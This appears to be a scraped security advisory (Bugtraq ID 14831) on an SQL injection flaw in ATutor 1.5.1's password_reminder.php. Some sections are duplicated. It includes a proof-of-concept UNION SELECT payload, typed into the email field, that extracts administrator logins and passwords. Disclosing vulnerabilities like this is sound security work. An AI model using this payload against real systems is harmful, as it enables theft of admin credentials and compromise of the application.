ATutor Password_Reminder.PHP SQL Injection Vulnerability
BID:14831
Info
ATutor Password_Reminder.PHP SQL Injection Vulnerability
| Bugtraq ID: | 14831 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 14 2005 12:00AM |
| Updated: | Sep 14 2005 12:00AM |
| Credit: | rgod is credited with the discovery of this vulnerability. |
| Vulnerable: |
ATutor ATutor 1.5.1 |
| Not Vulnerable: | |
Discussion
ATutor Password_Reminder.PHP SQL Injection Vulnerability
ATutor is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
ATutor is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
ATutor Password_Reminder.PHP SQL Injection Vulnerability
No exploit is required.
The following proof of concept is available:
go to http://www.example.com/atutor/password_reminder.php
and in the email field type:
' UNION SELECT login, password, '[email protected]' FROM AT_admins /*
No exploit is required.
The following proof of concept is available:
go to http://www.example.com/atutor/password_reminder.php
and in the email field type:
' UNION SELECT login, password, '[email protected]' FROM AT_admins /*
Solution / Fix
ATutor Password_Reminder.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ATutor Password_Reminder.PHP SQL Injection Vulnerability
References:
References: